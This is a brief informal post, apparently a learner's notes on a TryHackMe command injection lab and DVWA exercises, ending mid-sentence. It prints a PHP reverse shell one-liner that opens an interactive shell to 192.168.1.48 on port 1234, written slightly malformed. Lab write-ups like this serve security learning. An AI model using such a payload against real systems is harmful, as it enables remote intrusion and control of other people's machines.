Command Injection Part 2 TryHackMe | Owasp Top 10
Command Injection Part 2 TryHackMe | Owasp Top 10: Finally covered all the sessions of command injection for TryToHackMe though I didnt really learn anything at alll but I still wanted to see if there was something that I could improve • Security • Command injection • command-injection, security
Finally covered all the sessions of command injection for TryToHackMe though I didnt really learn anything at alll but I still wanted to see if there was something that I could improve
in the example we made use of a php shell
php -r '$sock=fsockopen("192.168.1.48",1234); exec("/bin/sh -i &3 2>&3");'
quite simple example
then afterwards I they was few exercises within Damn Vulnerable Web Application (DVWA) v1.8
nothing that particular some php code just...

